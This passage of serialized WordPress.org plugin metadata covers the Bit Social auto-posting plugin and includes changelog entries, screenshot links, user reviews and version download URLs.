WordPress site redirecting incorrectly!</li>\n</ul>\n</li>\n</ul>\n<h4>v1.0.15 (June 08, 2024)</h4>\n<ul>\n<li>Integration:\n<ul>\n<li>Discord integration added</li>\n</ul>\n</li>\n<li>Fixed:\n<ul>\n<li>Window close after clicking account button</li>\n</ul>\n</li>\n<li>Other:\n<ul>\n<li>State added to Tumblr integration</li>\n</ul>\n</li>\n</ul>\n<h4>v1.0.14 (June 06, 2024)</h4>\n<ul>\n<li>Improvement:\n<ul>\n<li>Added notes and documentation links to enhance user experience.</li>\n</ul>\n</li>\n<li>Other:\n<ul>\n<li>Tested with WordPress version 6.5.4</li>\n</ul>\n</li>\n</ul>\n<h4>v1.0.13 (June 03, 2024)</h4>\n<ul>\n<li>Integration:\n<ul>\n<li>Pinterest integration added (Post, Link Card, Single Image)</li>\n</ul>\n</li>\n<li>Features:\n<ul>\n<li>Added a toast notification for auto-save operations.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.0.12 (May 22, 2024)</h4>\n<ul>\n<li>Integration:\n<ul>\n<li>Google Business Profile  integration added (Post, Link Card, Single Image)</li>\n</ul>\n</li>\n<li>Others:\n<ul>\n<li>Added wp-telemetry package to collect some insights from users.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.0.11 (May 08, 2024)</h4>\n<ul>\n<li>Integration\n<ul>\n<li>Tumblr integration added (Post, Link Card, Single Image)</li>\n</ul>\n</li>\n<li>Feature:\n<ul>\n<li>Added search option in specific post filter</li>\n</ul>\n</li>\n<li>Fix:\n<ul>\n<li>Filter issues of categories and tags, pages, and media.</li>\n<li>Calendar scheduling post without any filter option.</li>\n<li>Social template page error for upcoming platforms.</li>\n</ul>\n</li>\n<li>Improvement:\n<ul>\n<li>Removed unnecessary frontend query.</li>\n<li>Optimized backend query and refactored code</li>\n</ul>\n</li>\n</ul>\n<h4>v1.0.10 (March 13, 2024)</h4>\n<ul>\n<li>Fix:\n<ul>\n<li>Facebook custom app connect.</li>\n<li>Schedule post issue.</li>\n</ul>\n</li>\n<li>Improvement:\n<ul>\n<li>Share now single platform select.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.0.9 (March 04, 2024)</h4>\n<ul>\n<li>Feature:\n<ul>\n<li>Display accounts using a tree structure in auto post.</li>\n<li>Enable filtering of posts by selecting their titles in Schedule Modal.</li>\n</ul>\n</li>\n<li>Fix:\n<ul>\n<li>Status complete when filter post are published in social Media.</li>\n<li>Solve Z-index issue.</li>\n<li>Auto-post functionality error.</li>\n<li>Addressed the issue with custom messages in the scheduling modal.</li>\n<li>Updated the next post Schedule timing.</li>\n</ul>\n</li>\n<li>Improvement:\n<ul>\n<li>Select platform from share now modal and style updated.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.0.8 (Feb 08, 2024)</h4>\n<ul>\n<li>Feature:\n<ul>\n<li>Account active and disable globally</li>\n</ul>\n</li>\n<li>Fix:\n<ul>\n<li>Share now media upload replaced with wp.media</li>\n<li>Account type issue, table deselect</li>\n<li>Schedule time &amp; calender modal issue</li>\n</ul>\n</li>\n<li>Improvement:\n<ul>\n<li>Fetch account, show &amp; sanitization</li>\n<li>Account removed from schedules</li>\n</ul>\n</li>\n</ul>\n<h4>v1.0.7 (Jan 24, 2024)</h4>\n<ul>\n<li>Fix:\n<ul>\n<li>Schedule table pagination</li>\n<li>Share Now table pagination</li>\n<li>Log table pagination</li>\n<li>JS warning</li>\n</ul>\n</li>\n</ul>\n<h4>v1.0.6 (Jan 23, 2024)</h4>\n<ul>\n<li>Improvement:\n<ul>\n<li>Schedule crud ux improved</li>\n</ul>\n</li>\n<li>Fix:\n<ul>\n<li>Linkedin integration warring in backend fixed</li>\n<li>Share now status change bug fixed</li>\n<li>Schedule list not showing in calendar</li>\n</ul>\n</li>\n</ul>\n<h4>v1.0.4</h4>\n<ul>\n<li>Improvement:\n<ul>\n<li>LinkedIn authorization updated</li>\n<li>Schedule status not change issue fixed</li>\n</ul>\n</li>\n</ul>\n<h4>v1.0.0</h4>\n<ul>\n<li>Initial release</li>\n</ul>\n\";s:11:\"screenshots\";s:1877:\"<ol><li><a href=\"https://ps.w.org/bit-social/assets/screenshot-1.jpg?rev=3176768\"><img src=\"https://ps.w.org/bit-social/assets/screenshot-1.jpg?rev=3176768\" alt=\"Supported Platforms\"></a><p>Supported Platforms</p></li><li><a href=\"https://ps.w.org/bit-social/assets/screenshot-2.jpg?rev=3176768\"><img src=\"https://ps.w.org/bit-social/assets/screenshot-2.jpg?rev=3176768\" alt=\"Automated Social Posting\"></a><p>Automated Social Posting</p></li><li><a href=\"https://ps.w.org/bit-social/assets/screenshot-3.jpg?rev=3176768\"><img src=\"https://ps.w.org/bit-social/assets/screenshot-3.jpg?rev=3176768\" alt=\"Customize Schedule\"></a><p>Customize Schedule</p></li><li><a href=\"https://ps.w.org/bit-social/assets/screenshot-4.jpg?rev=3176768\"><img src=\"https://ps.w.org/bit-social/assets/screenshot-4.jpg?rev=3176768\" alt=\"Smart Post Sharing\"></a><p>Smart Post Sharing</p></li><li><a href=\"https://ps.w.org/bit-social/assets/screenshot-5.jpg?rev=3176768\"><img src=\"https://ps.w.org/bit-social/assets/screenshot-5.jpg?rev=3176768\" alt=\"Connected Accounts\"></a><p>Connected Accounts</p></li><li><a href=\"https://ps.w.org/bit-social/assets/screenshot-6.jpg?rev=3176768\"><img src=\"https://ps.w.org/bit-social/assets/screenshot-6.jpg?rev=3176768\" alt=\"Calendar\"></a><p>Calendar</p></li><li><a href=\"https://ps.w.org/bit-social/assets/screenshot-7.jpg?rev=3176768\"><img src=\"https://ps.w.org/bit-social/assets/screenshot-7.jpg?rev=3176768\" alt=\"Templates\"></a><p>Templates</p></li><li><a href=\"https://ps.w.org/bit-social/assets/screenshot-8.jpg?rev=3176768\"><img src=\"https://ps.w.org/bit-social/assets/screenshot-8.jpg?rev=3176768\" alt=\"Logs\"></a><p>Logs</p></li><li><a href=\"https://ps.w.org/bit-social/assets/screenshot-9.jpg?rev=3176768\"><img src=\"https://ps.w.org/bit-social/assets/screenshot-9.jpg?rev=3176768\" alt=\"Post Scheduling Progress\"></a><p>Post Scheduling Progress</p></li></ol>\";s:7:\"reviews\";s:18323:\"<div class=\"review\">\n	<div class=\"review-head\">\n		<div class=\"reviewer-info\">\n			<div class=\"review-title-section\">\n				<h4 class=\"review-title\">Nice plugin to automate</h4>\n				<div class=\"star-rating\">\n				<div class=\"wporg-ratings\" aria-label=\"5 out of 5 stars\" data-title-template=\"%s out of 5 stars\" data-rating=\"5\" style=\"color:#ffb900;\"><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span></div>				</div>\n			</div>\n			<p class=\"reviewer\">\n				By <a href=\"https://profiles.wordpress.org/ryanebk/\"><img alt=\'\' src=\'https://secure.gravatar.com/avatar/39d5121d4bf7acf576de132c281327b0765f01caa117a243ff0ca7d148bc9726?s=16&#038;d=monsterid&#038;r=g\' srcset=\'https://secure.gravatar.com/avatar/39d5121d4bf7acf576de132c281327b0765f01caa117a243ff0ca7d148bc9726?s=32&#038;d=monsterid&#038;r=g 2x\' class=\'avatar avatar-16 photo\' height=\'16\' width=\'16\' loading=\'lazy\' decoding=\'async\'/></a><a href=\"https://profiles.wordpress.org/ryanebk/\" class=\"reviewer-name\">ryanebk</a> on <span class=\"review-date\">May 5, 2026</span>			</p>\n		</div>\n	</div>\n	<div class=\"review-body\"><!-- wp:paragraph -->\n<p>Automated parts of our socials with it</p>\n<!-- /wp:paragraph --></div>\n</div>\n<div class=\"review\">\n	<div class=\"review-head\">\n		<div class=\"reviewer-info\">\n			<div class=\"review-title-section\">\n				<h4 class=\"review-title\">Such a useful flexible plugin and great support</h4>\n				<div class=\"star-rating\">\n				<div class=\"wporg-ratings\" aria-label=\"5 out of 5 stars\" data-title-template=\"%s out of 5 stars\" data-rating=\"5\" style=\"color:#ffb900;\"><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span></div>				</div>\n			</div>\n			<p class=\"reviewer\">\n				By <a href=\"https://profiles.wordpress.org/johnhuk55/\"><img alt=\'\' src=\'https://secure.gravatar.com/avatar/663e9cc2c8e036eaf45480c0e9533ba99e4380e28c47bed6d4c68aba07abb349?s=16&#038;d=monsterid&#038;r=g\' srcset=\'https://secure.gravatar.com/avatar/663e9cc2c8e036eaf45480c0e9533ba99e4380e28c47bed6d4c68aba07abb349?s=32&#038;d=monsterid&#038;r=g 2x\' class=\'avatar avatar-16 photo\' height=\'16\' width=\'16\' loading=\'lazy\' decoding=\'async\'/></a><a href=\"https://profiles.wordpress.org/johnhuk55/\" class=\"reviewer-name\">johnhuk55</a> on <span class=\"review-date\">May 4, 2026</span>			</p>\n		</div>\n	</div>\n	<div class=\"review-body\"><!-- wp:paragraph -->\n<p>Have purchased and finding it very useful to autopost to Facebook. An issue I had was quickly solved and proves how flexible the plugin is when using CPT listings in Wordpress and wanting to post to more than one FB account.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Great support .. thanks, recommended.</p>\n<!-- /wp:paragraph --></div>\n</div>\n<div class=\"review\">\n	<div class=\"review-head\">\n		<div class=\"reviewer-info\">\n			<div class=\"review-title-section\">\n				<h4 class=\"review-title\">Doesn&#039;t work!</h4>\n				<div class=\"star-rating\">\n				<div class=\"wporg-ratings\" aria-label=\"1 out of 5 stars\" data-title-template=\"%s out of 5 stars\" data-rating=\"1\" style=\"color:#ffb900;\"><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-empty\"></span><span class=\"star dashicons dashicons-star-empty\"></span><span class=\"star dashicons dashicons-star-empty\"></span><span class=\"star dashicons dashicons-star-empty\"></span></div>				</div>\n			</div>\n			<p class=\"reviewer\">\n				By <a href=\"https://profiles.wordpress.org/fepreve/\"><img alt=\'\' src=\'https://secure.gravatar.com/avatar/6fb8aea7737971e6e7254db6ed630fc7a724170fcb9dbeb447a5cc485e71f3f6?s=16&#038;d=monsterid&#038;r=g\' srcset=\'https://secure.gravatar.com/avatar/6fb8aea7737971e6e7254db6ed630fc7a724170fcb9dbeb447a5cc485e71f3f6?s=32&#038;d=monsterid&#038;r=g 2x\' class=\'avatar avatar-16 photo\' height=\'16\' width=\'16\' loading=\'lazy\' decoding=\'async\'/></a><a href=\"https://profiles.wordpress.org/fepreve/\" class=\"reviewer-name\">fepreve</a> on <span class=\"review-date\">September 23, 2025</span>			</p>\n		</div>\n	</div>\n	<div class=\"review-body\"><!-- wp:paragraph -->\n<p>Free or paid, this plugin doesn\'t work. The \"share now\" feature simply fails every time, even after making all the necessary settings and adjustments in the cron job.</p>\n<!-- /wp:paragraph --></div>\n</div>\n<div class=\"review\">\n	<div class=\"review-head\">\n		<div class=\"reviewer-info\">\n			<div class=\"review-title-section\">\n				<h4 class=\"review-title\">False promises</h4>\n				<div class=\"star-rating\">\n				<div class=\"wporg-ratings\" aria-label=\"1 out of 5 stars\" data-title-template=\"%s out of 5 stars\" data-rating=\"1\" style=\"color:#ffb900;\"><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-empty\"></span><span class=\"star dashicons dashicons-star-empty\"></span><span class=\"star dashicons dashicons-star-empty\"></span><span class=\"star dashicons dashicons-star-empty\"></span></div>				</div>\n			</div>\n			<p class=\"reviewer\">\n				By <a href=\"https://profiles.wordpress.org/mikekesler/\"><img alt=\'\' src=\'https://secure.gravatar.com/avatar/290c1e89c901d720e80d13b1daeff9557027743df3f1b2125334f8611a149fd5?s=16&#038;d=monsterid&#038;r=g\' srcset=\'https://secure.gravatar.com/avatar/290c1e89c901d720e80d13b1daeff9557027743df3f1b2125334f8611a149fd5?s=32&#038;d=monsterid&#038;r=g 2x\' class=\'avatar avatar-16 photo\' height=\'16\' width=\'16\' loading=\'lazy\' decoding=\'async\'/></a><a href=\"https://profiles.wordpress.org/mikekesler/\" class=\"reviewer-name\">mikekesler</a> on <span class=\"review-date\">March 5, 2025</span>			</p>\n		</div>\n	</div>\n	<div class=\"review-body\"><!-- wp:paragraph -->\n<p>I specifically chose this plugin for a feature, that they claim to offer for free (whereas other plugins charge for it). <br /><br />After installing the plugin and trying to setup the feature, it turns out that the feature is not free after all and only available at the pro version. <br /><br />Because i hate bait and switch tactics, i uninstalled and left a one star for shady business practices.</p>\n<!-- /wp:paragraph --></div>\n</div>\n<div class=\"review\">\n	<div class=\"review-head\">\n		<div class=\"reviewer-info\">\n			<div class=\"review-title-section\">\n				<h4 class=\"review-title\">Only Facebook and LinkedIn are Free</h4>\n				<div class=\"star-rating\">\n				<div class=\"wporg-ratings\" aria-label=\"1 out of 5 stars\" data-title-template=\"%s out of 5 stars\" data-rating=\"1\" style=\"color:#ffb900;\"><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-empty\"></span><span class=\"star dashicons dashicons-star-empty\"></span><span class=\"star dashicons dashicons-star-empty\"></span><span class=\"star dashicons dashicons-star-empty\"></span></div>				</div>\n			</div>\n			<p class=\"reviewer\">\n				By <a href=\"https://profiles.wordpress.org/kamatsukyoto/\"><img alt=\'\' src=\'https://secure.gravatar.com/avatar/ee51135fb6642500627d1b15363e718980890de8a082abc3dcb010646c518e79?s=16&#038;d=monsterid&#038;r=g\' srcset=\'https://secure.gravatar.com/avatar/ee51135fb6642500627d1b15363e718980890de8a082abc3dcb010646c518e79?s=32&#038;d=monsterid&#038;r=g 2x\' class=\'avatar avatar-16 photo\' height=\'16\' width=\'16\' loading=\'lazy\' decoding=\'async\'/></a><a href=\"https://profiles.wordpress.org/kamatsukyoto/\" class=\"reviewer-name\">KamatsuKyoto</a> on <span class=\"review-date\">February 17, 2025</span>			</p>\n		</div>\n	</div>\n	<div class=\"review-body\"><!-- wp:paragraph -->\n<p>Useless</p>\n<!-- /wp:paragraph --></div>\n</div>\n<div class=\"review\">\n	<div class=\"review-head\">\n		<div class=\"reviewer-info\">\n			<div class=\"review-title-section\">\n				<h4 class=\"review-title\">Easier to Use for Non-Technical Users</h4>\n				<div class=\"star-rating\">\n				<div class=\"wporg-ratings\" aria-label=\"5 out of 5 stars\" data-title-template=\"%s out of 5 stars\" data-rating=\"5\" style=\"color:#ffb900;\"><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span></div>				</div>\n			</div>\n			<p class=\"reviewer\">\n				By <a href=\"https://profiles.wordpress.org/mancahai/\"><img alt=\'\' src=\'https://secure.gravatar.com/avatar/e0c306b9998d0588c9049cbb9f96aece5ecb6ca66cdb0e8aad9750ac947058f1?s=16&#038;d=monsterid&#038;r=g\' srcset=\'https://secure.gravatar.com/avatar/e0c306b9998d0588c9049cbb9f96aece5ecb6ca66cdb0e8aad9750ac947058f1?s=32&#038;d=monsterid&#038;r=g 2x\' class=\'avatar avatar-16 photo\' height=\'16\' width=\'16\' loading=\'lazy\' decoding=\'async\'/></a><a href=\"https://profiles.wordpress.org/mancahai/\" class=\"reviewer-name\">ManCreat <small>(mancahai)</small></a> on <span class=\"review-date\">February 5, 2025</span>			</p>\n		</div>\n	</div>\n	<div class=\"review-body\"><!-- wp:paragraph -->\n<p>I find it much easier to manage auto-posting using Bit Social than the previous plugin. All the settings look simpler and less confusing for a non-techies user like me. But, I think this plugin needs more improvement like social media platforms and analytics.</p>\n<!-- /wp:paragraph --></div>\n</div>\n<div class=\"review\">\n	<div class=\"review-head\">\n		<div class=\"reviewer-info\">\n			<div class=\"review-title-section\">\n				<h4 class=\"review-title\">Auto Posting Plugin That Gives You Freedom</h4>\n				<div class=\"star-rating\">\n				<div class=\"wporg-ratings\" aria-label=\"5 out of 5 stars\" data-title-template=\"%s out of 5 stars\" data-rating=\"5\" style=\"color:#ffb900;\"><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span></div>				</div>\n			</div>\n			<p class=\"reviewer\">\n				By <a href=\"https://profiles.wordpress.org/goedang/\"><img alt=\'\' src=\'https://secure.gravatar.com/avatar/0736d261aa77bd05c4983b15b799b2b571028478b64808f8de73ebd5dcba78d2?s=16&#038;d=monsterid&#038;r=g\' srcset=\'https://secure.gravatar.com/avatar/0736d261aa77bd05c4983b15b799b2b571028478b64808f8de73ebd5dcba78d2?s=32&#038;d=monsterid&#038;r=g 2x\' class=\'avatar avatar-16 photo\' height=\'16\' width=\'16\' loading=\'lazy\' decoding=\'async\'/></a><a href=\"https://profiles.wordpress.org/goedang/\" class=\"reviewer-name\">goedang</a> on <span class=\"review-date\">January 30, 2025</span>			</p>\n		</div>\n	</div>\n	<div class=\"review-body\"><!-- wp:paragraph -->\n<p>I am impressed by its great potential in managing social media content directly from WordPress. The Post Scheduling feature makes it very easy for me to schedule each post according to the social media platform. One of the ones I use most often is Pinterest. Bit Social can keep the shared content interesting because of the separate media inclusion feature. Plus, there is a Smart Tags feature that allows automatic addition of tags according to the tags on the post.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, in my opinion, it would be better if Bit Social added a more detailed analytics feature. The integration analytics plugins provide detailed graphs to help users understand content performance better. Overall, Bit Social has captured my interest, and I\'m thrilled to use it!</p>\n<!-- /wp:paragraph --></div>\n</div>\n<div class=\"review\">\n	<div class=\"review-head\">\n		<div class=\"reviewer-info\">\n			<div class=\"review-title-section\">\n				<h4 class=\"review-title\">Best Social Media Autoposting Plugins for Service Providers</h4>\n				<div class=\"star-rating\">\n				<div class=\"wporg-ratings\" aria-label=\"5 out of 5 stars\" data-title-template=\"%s out of 5 stars\" data-rating=\"5\" style=\"color:#ffb900;\"><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span></div>				</div>\n			</div>\n			<p class=\"reviewer\">\n				By <a href=\"https://profiles.wordpress.org/optimuseo/\"><img alt=\'\' src=\'https://secure.gravatar.com/avatar/c3f1005ba729251fec1968742a71d70ea1a15db7935216353c5827e2d9541176?s=16&#038;d=monsterid&#038;r=g\' srcset=\'https://secure.gravatar.com/avatar/c3f1005ba729251fec1968742a71d70ea1a15db7935216353c5827e2d9541176?s=32&#038;d=monsterid&#038;r=g 2x\' class=\'avatar avatar-16 photo\' height=\'16\' width=\'16\' loading=\'lazy\' decoding=\'async\'/></a><a href=\"https://profiles.wordpress.org/optimuseo/\" class=\"reviewer-name\">optimuseo</a> on <span class=\"review-date\">January 25, 2025</span>			</p>\n		</div>\n	</div>\n	<div class=\"review-body\"><!-- wp:paragraph -->\n<p>As a marketing business, I provide website building, SEO, SEM, and social media operations to my clients, and previously I needed to leave the social media operations to a separate person. The cost of this has gone up to a great extent.<br />After using Bit Social, I can have quality articles written by SEO staff automatically posted to the corresponding social media accounts, which greatly reduces the workload of social media operators and improves the effectiveness of articles written by SEO staff.<br />I am very much looking forward to the updates of this plugin and I am sure he will bring me more surprises!</p>\n<!-- /wp:paragraph --></div>\n</div>\n<div class=\"review\">\n	<div class=\"review-head\">\n		<div class=\"reviewer-info\">\n			<div class=\"review-title-section\">\n				<h4 class=\"review-title\">Okay, but needs improvement</h4>\n				<div class=\"star-rating\">\n				<div class=\"wporg-ratings\" aria-label=\"4 out of 5 stars\" data-title-template=\"%s out of 5 stars\" data-rating=\"4\" style=\"color:#ffb900;\"><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-empty\"></span></div>				</div>\n			</div>\n			<p class=\"reviewer\">\n				By <a href=\"https://profiles.wordpress.org/pierreto/\"><img alt=\'\' src=\'https://secure.gravatar.com/avatar/4b937a18032b8808593293c95dd330659df1782259c87a64b03197f4abc5dd1f?s=16&#038;d=monsterid&#038;r=g\' srcset=\'https://secure.gravatar.com/avatar/4b937a18032b8808593293c95dd330659df1782259c87a64b03197f4abc5dd1f?s=32&#038;d=monsterid&#038;r=g 2x\' class=\'avatar avatar-16 photo\' height=\'16\' width=\'16\' loading=\'lazy\' decoding=\'async\'/></a><a href=\"https://profiles.wordpress.org/pierreto/\" class=\"reviewer-name\">Pierre236 <small>(Pierreto)</small></a> on <span class=\"review-date\">January 22, 2025</span>			</p>\n		</div>\n	</div>\n	<div class=\"review-body\"><!-- wp:paragraph -->\n<p>I\'ve just tested a lot of plugins, Wordpress and Themforest (most of them),  to be able to post my articles automatically on social networks one day after their publication.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I had problems with all of them before settling on Bit Social, my final choice.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>But it lacks features like a url shortener and networks, like Mastodon and Telegram (which should be coming).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Otherwise, connecting to networks is easy and finally trouble-free, no need to spend hours configuring an app that ultimately doesn\'t work, except for X (Twitter) which works fine.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Perfect for Pinterest, no need to create an app and make a video (as is necessary for many sharing plugins).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For auto posts, it\'s perfect, but there\'s no option (as other plugins do) to select and post articles to the networks from the Wordpress article list.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>And to post an article directly to the networks, you have to fill in the information for all the networks, including the summary, link and photos in all the boxes for each network!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>But with other plugins, once you\'ve made the settings, you simply select the article and the networks, and everything is done automatically, so you don\'t have to waste time.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So good for auto post, but there\'s still improvement to be made!</p>\n<!-- /wp:paragraph --></div>\n</div>\n<div class=\"review\">\n	<div class=\"review-head\">\n		<div class=\"reviewer-info\">\n			<div class=\"review-title-section\">\n				<h4 class=\"review-title\">A must have plugin</h4>\n				<div class=\"star-rating\">\n				<div class=\"wporg-ratings\" aria-label=\"5 out of 5 stars\" data-title-template=\"%s out of 5 stars\" data-rating=\"5\" style=\"color:#ffb900;\"><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span></div>				</div>\n			</div>\n			<p class=\"reviewer\">\n				By <a href=\"https://profiles.wordpress.org/aminej2000/\"><img alt=\'\' src=\'https://secure.gravatar.com/avatar/c65c076c09ba4fd609650a8d1c4ba257b73a4fdfaaf1b3c08ccc4fefd597fc9f?s=16&#038;d=monsterid&#038;r=g\' srcset=\'https://secure.gravatar.com/avatar/c65c076c09ba4fd609650a8d1c4ba257b73a4fdfaaf1b3c08ccc4fefd597fc9f?s=32&#038;d=monsterid&#038;r=g 2x\' class=\'avatar avatar-16 photo\' height=\'16\' width=\'16\' loading=\'lazy\' decoding=\'async\'/></a><a href=\"https://profiles.wordpress.org/aminej2000/\" class=\"reviewer-name\">aminej2000</a> on <span class=\"review-date\">December 7, 2024</span>			</p>\n		</div>\n	</div>\n	<div class=\"review-body\"><!-- wp:paragraph -->\n<p>Freindly support, super plugin, I purshased the plugin and I\'m very satisfied. Waiting for the Pi plugin the new one.</p>\n<!-- /wp:paragraph --></div>\n</div>\n\";}s:17:\"short_description\";s:137:\"Schedule WordPress posts to social media and auto share content across Facebook, Twitter (X), Instagram, Pinterest, TikTok, and LinkedIn.\";s:13:\"download_link\";s:61:\"https://downloads.wordpress.org/plugin/bit-social.1.13.10.zip\";s:14:\"upgrade_notice\";a:0:{}s:11:\"screenshots\";a:9:{i:1;a:2:{s:3:\"src\";s:63:\"https://ps.w.org/bit-social/assets/screenshot-1.jpg?rev=3176768\";s:7:\"caption\";s:19:\"Supported Platforms\";}i:2;a:2:{s:3:\"src\";s:63:\"https://ps.w.org/bit-social/assets/screenshot-2.jpg?rev=3176768\";s:7:\"caption\";s:24:\"Automated Social Posting\";}i:3;a:2:{s:3:\"src\";s:63:\"https://ps.w.org/bit-social/assets/screenshot-3.jpg?rev=3176768\";s:7:\"caption\";s:18:\"Customize Schedule\";}i:4;a:2:{s:3:\"src\";s:63:\"https://ps.w.org/bit-social/assets/screenshot-4.jpg?rev=3176768\";s:7:\"caption\";s:18:\"Smart Post Sharing\";}i:5;a:2:{s:3:\"src\";s:63:\"https://ps.w.org/bit-social/assets/screenshot-5.jpg?rev=3176768\";s:7:\"caption\";s:18:\"Connected Accounts\";}i:6;a:2:{s:3:\"src\";s:63:\"https://ps.w.org/bit-social/assets/screenshot-6.jpg?rev=3176768\";s:7:\"caption\";s:8:\"Calendar\";}i:7;a:2:{s:3:\"src\";s:63:\"https://ps.w.org/bit-social/assets/screenshot-7.jpg?rev=3176768\";s:7:\"caption\";s:9:\"Templates\";}i:8;a:2:{s:3:\"src\";s:63:\"https://ps.w.org/bit-social/assets/screenshot-8.jpg?rev=3176768\";s:7:\"caption\";s:4:\"Logs\";}i:9;a:2:{s:3:\"src\";s:63:\"https://ps.w.org/bit-social/assets/screenshot-9.jpg?rev=3176768\";s:7:\"caption\";s:24:\"Post Scheduling Progress\";}}s:4:\"tags\";a:5:{s:9:\"auto-post\";s:9:\"auto post\";s:10:\"auto-share\";s:10:\"auto share\";s:13:\"cross-posting\";s:13:\"cross posting\";s:23:\"social-media-automation\";s:23:\"social media automation\";s:22:\"social-media-scheduler\";s:22:\"social media scheduler\";}s:8:\"versions\";a:97:{s:5:\"0.1.0\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.0.1.0.zip\";s:5:\"1.0.0\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.0.0.zip\";s:5:\"1.0.1\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.0.1.zip\";s:6:\"1.0.10\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.0.10.zip\";s:6:\"1.0.11\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.0.11.zip\";s:6:\"1.0.12\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.0.12.zip\";s:6:\"1.0.13\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.0.13.zip\";s:6:\"1.0.14\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.0.14.zip\";s:6:\"1.0.15\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.0.15.zip\";s:6:\"1.0.16\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.0.16.zip\";s:6:\"1.0.17\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.0.17.zip\";s:6:\"1.0.18\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.0.18.zip\";s:6:\"1.0.19\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.0.19.zip\";s:5:\"1.0.2\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.0.2.zip\";s:6:\"1.0.20\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.0.20.zip\";s:6:\"1.0.21\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.0.21.zip\";s:6:\"1.0.22\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.0.22.zip\";s:6:\"1.0.23\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.0.23.zip\";s:5:\"1.0.3\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.0.3.zip\";s:6:\"1.0.34\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.0.34.zip\";s:6:\"1.0.35\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.0.35.zip\";s:6:\"1.0.36\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.0.36.zip\";s:6:\"1.0.37\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.0.37.zip\";s:6:\"1.0.38\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.0.38.zip\";s:6:\"1.0.39\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.0.39.zip\";s:5:\"1.0.4\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.0.4.zip\";s:6:\"1.0.41\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.0.41.zip\";s:6:\"1.0.43\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.0.43.zip\";s:6:\"1.0.44\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.0.44.zip\";s:6:\"1.0.45\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.0.45.zip\";s:6:\"1.0.46\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.0.46.zip\";s:6:\"1.0.47\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.0.47.zip\";s:5:\"1.0.5\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.0.5.zip\";s:5:\"1.0.6\";s:59:\"https://downloads.wordpress.org/plugin/bit-social.1.0.6.zip\";s:5:\"1.0.7\";s:59:\"https://downloads.wordpress.org/p